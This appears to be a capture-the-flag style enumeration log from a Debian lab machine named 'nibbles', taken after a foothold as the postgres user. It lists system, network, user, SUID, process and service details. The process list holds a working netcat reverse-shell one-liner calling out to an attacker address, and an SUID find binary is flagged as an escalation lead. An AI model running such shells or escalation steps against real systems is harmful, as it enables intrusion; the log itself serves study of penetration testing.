System/Kernel
postgres@nibbles:/var/lib/postgresql/11/main$ uname -a ; cat /etc/*release
Linux nibbles 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"4.19.0-8-amd64x86_64Debian GNU/Linux 10 (buster)
Networks
postgres@nibbles:/var/lib/postgresql/11/main$ ip route ; arp -a
default via 192.168.148.254 dev ens192 onlink
192.168.148.0/24 dev ens192 proto kernel scope link src 192.168.148.47
? (192.168.148.254) at 00:50:56:9e:fc:4d [ether] on ens192postgres@nibbles:/var/lib/postgresql/11/main$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:5437 0.0.0.0:* LISTEN 533/postgres
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 192.168.148.47:5437 192.168.45.245:47208 ESTABLISHED 1496/postgres: 11/m
tcp 0 301 192.168.148.47:60534 192.168.45.245:5437 ESTABLISHED 1586/nc
udp 0 0 127.0.0.1:45625 127.0.0.1:45625 ESTABLISHED 533/postgres Users & Groups
postgres@nibbles:/var/lib/postgresql/11/main$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
wilson:x:1000:1000:wilson,,,:/home/wilson:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
postgres:x:106:113:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
Debian-snmp:x:107:114::/var/lib/snmp:/bin/false
ftp:x:108:117:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
total 12K
4.0K drwxr-xr-x 4 wilson wilson 4.0K Jul 9 2020 wilson
4.0K drwxr-xr-x 3 root root 4.0K Apr 27 2020 .
4.0K drwxr-xr-x 18 root root 4.0K Apr 27 2020 ..wilson
postgres@nibbles:/var/lib/postgresql/11/main$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(wilson) gid=1000(wilson) groups=1000(wilson),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)
uid=107(Debian-snmp) gid=114(Debian-snmp) groups=114(Debian-snmp)
uid=108(ftp) gid=117(ftp) groups=117(ftp)uid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)uid=1000(wilson) gid=1000(wilson) groups=1000(wilson),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
SUIDs
postgres@nibbles:/var/lib/postgresql/11/main$ find / -perm -04000 -ls -type f 2>/dev/null
137358 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
19052 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
15602 52 -rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
282 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
286 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
285 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
283 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
34845 36 -rwsr-xr-x 1 root root 34896 Jan 7 2019 /usr/bin/fusermount
3838 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
261 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
4071 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
2248 312 -rwsr-xr-x 1 root root 315904 Feb 16 2019 /usr/bin/find
22663 156 -rwsr-xr-x 1 root root 157192 Feb 2 2020 /usr/bin/sudo
4073 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount 2248 312 -rwsr-xr-x 1 root root 315904 Feb 16 2019 /usr/bin/find
SGIDs
postgres@nibbles:/var/lib/postgresql/11/main$ find / -type f -perm -02000 -ls 2>/dev/null
284 32 -rwxr-sr-x 1 root shadow 31000 Jul 27 2018 /usr/bin/expiry
281 72 -rwxr-sr-x 1 root shadow 71816 Jul 27 2018 /usr/bin/chage
19045 316 -rwxr-sr-x 1 root ssh 321672 Jan 31 2020 /usr/bin/ssh-agent
15839 20 -rwxr-sr-x 1 root mail 18944 Dec 3 2017 /usr/bin/dotlockfile
6011 16 -rwxr-sr-x 1 root tty 14736 May 4 2018 /usr/bin/bsd-write
1872 36 -rwxr-sr-x 1 root tty 34896 Jan 10 2019 /usr/bin/wall
2137 44 -rwxr-sr-x 1 root crontab 43568 Oct 11 2019 /usr/bin/crontab
3043 40 -rwxr-sr-x 1 root shadow 39616 Feb 14 2019 /usr/sbin/unix_chkpwdCapabilities
postgres@nibbles:/var/lib/postgresql/11/main$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+epProcesses
postgres@nibbles:/var/lib/postgresql/11/main$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 1.0 103832 10112 ? Ss 06:08 0:00 /sbin/init
root 252 0.0 0.7 40388 7976 ? Ss 06:08 0:00 /lib/systemd/systemd-journald
root 272 0.0 0.5 22056 5116 ? Ss 06:08 0:00 /lib/systemd/systemd-udevd
root 421 0.0 1.0 48220 10496 ? Ss 06:09 0:00 /usr/bin/VGAuthService
root 422 0.0 1.2 122876 12292 ? Ssl 06:09 0:03 /usr/bin/vmtoolsd
systemd+ 423 0.0 0.6 93080 6516 ? Ssl 06:09 0:00 /lib/systemd/systemd-timesyncd
root 425 0.0 0.6 19304 6300 ? Ss 06:09 0:00 /lib/systemd/systemd-logind
message+ 427 0.0 0.3 8988 3760 ? Ss 06:09 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 428 0.0 0.4 225824 4196 ? Ssl 06:09 0:00 /usr/sbin/rsyslogd -n -iNONE
root 436 0.0 0.2 8504 2772 ? Ss 06:09 0:00 /usr/sbin/cron -f
root 444 0.0 0.3 6620 3036 ? Ss 06:09 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root 452 0.0 0.1 5612 1672 tty1 Ss+ 06:09 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 455 0.0 0.7 15852 7084 ? Ss 06:09 0:00 /usr/sbin/sshd -D
root 496 0.0 0.4 8436 4752 ? Ss 06:09 0:00 /usr/sbin/apache2 -k start
postgres 533 0.0 2.6 213456 27020 ? S 06:09 0:00 /usr/lib/postgresql/11/bin/postgres -D /var/lib/postgresql/11/main -c config_file=/etc/postgresql/11/main/postgresql.conf
postgres 591 0.0 0.6 213556 6128 ? Ss 06:09 0:00 postgres: 11/main: checkpointer
postgres 592 0.0 0.5 213456 5920 ? Ss 06:09 0:00 postgres: 11/main: background writer
postgres 593 0.0 0.9 213456 9432 ? Ss 06:09 0:00 postgres: 11/main: walwriter
postgres 594 0.0 0.6 213864 6272 ? Ss 06:09 0:00 postgres: 11/main: autovacuum launcher
postgres 595 0.0 0.4 68512 4140 ? Ss 06:09 0:00 postgres: 11/main: stats collector
postgres 596 0.0 0.6 213864 6376 ? Ss 06:09 0:00 postgres: 11/main: logical replication launcher
www-data 1055 0.1 0.8 755888 8084 ? Sl 06:11 0:13 /usr/sbin/apache2 -k start
www-data 1056 0.1 0.8 755888 8692 ? Sl 06:11 0:13 /usr/sbin/apache2 -k start
postgres 1496 0.0 1.8 215404 18684 ? Ss 07:21 0:00 postgres: 11/main: postgres postgres 192.168.45.245(47208) COPY
postgres 1584 0.0 0.0 2388 760 ? S 08:11 0:00 sh -c mkfifo /tmp/inkzce; nc 192.168.45.245 5437 0</tmp/inkzce | /bin/sh >/tmp/inkzce 2>&1; rm /tmp/inkzce
postgres 1586 0.0 0.1 2372 1760 ? S 08:11 0:00 nc 192.168.45.245 5437
postgres 1587 0.0 0.0 2388 696 ? S 08:11 0:00 /bin/sh
postgres 1647 0.0 0.2 5556 2280 ? S 08:28 0:00 script /dev/null -c bash
postgres 1648 0.0 0.0 2388 692 pts/0 Ss 08:28 0:00 sh -c bash
postgres 1649 0.0 0.3 6992 3748 pts/0 S 08:28 0:00 bash
postgres 1700 0.0 0.3 10916 3340 pts/0 R+ 08:31 0:00 ps -auxwww
root 436 0.0 0.2 8504 2772 ? Ss 06:09 0:00 /usr/sbin/cron -fpostgres 533 0.0 2.6 213456 27020 ? S 06:09 0:00 /usr/lib/postgresql/11/bin/postgres -D /var/lib/postgresql/11/main -c config_file=/etc/postgresql/11/main/postgresql.conf
Cron & Systemd
postgres@nibbles:/var/lib/postgresql/11/main$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for postgres
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED
Sat 2025-03-01 22:01:43 EST 13h left Sat 2025-03-01 06:11:15 EST 2h 25min ago
Sun 2025-03-02 00:00:00 EST 15h left Sat 2025-03-01 06:11:15 EST 2h 25min ago
Sun 2025-03-02 00:00:00 EST 15h left Sat 2025-03-01 06:11:15 EST 2h 25min ago
Sun 2025-03-02 06:24:07 EST 21h left Sat 2025-03-01 06:24:07 EST 2h 12min ago
Sun 2025-03-02 06:45:46 EST 22h left Sat 2025-03-01 06:11:15 EST 2h 25min ago
5 timers listed.
Pass --all to see loaded but inactive timers, too.
lines 1-9/9 (END)Services
postgres@nibbles:/var/lib/postgresql/11/main$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable Fil
init.scope loaded active running System and Service Manage
apache2.service loaded active running The Apache HTTP Server
cron.service loaded active running Regular background progra
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
open-vm-tools.service loaded active running Service for virtual machi
postgresql@11-main.service loaded active running PostgreSQL Cluster 11-mai
rsyslog.service loaded active running System Logging Service
ssh.service loaded active running OpenBSD Secure Shell serv
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-timesyncd.service loaded active running Network Time Synchronizat
systemd-udevd.service loaded active running udev Kernel Device Manage
vgauth.service loaded active running Authentication service fo
vsftpd.service loaded active running vsftpd FTP server
dbus.socket loaded active running D-Bus System Message Bus
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
23 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
lines 9-31/31 (END) Sudo Version
postgres@nibbles:/var/lib/postgresql/11/main$ sudsudo --version
Sudo version 1.8.27
Sudoers policy plugin version 1.8.27
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.27Sudo version 1.8.27
Glibc Version
postgres@nibbles:/var/lib/postgresql/11/main$ ldd --version
ldd (Debian GLIBC 2.28-10) 2.28
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Debian GLIBC 2.28-10) 2.28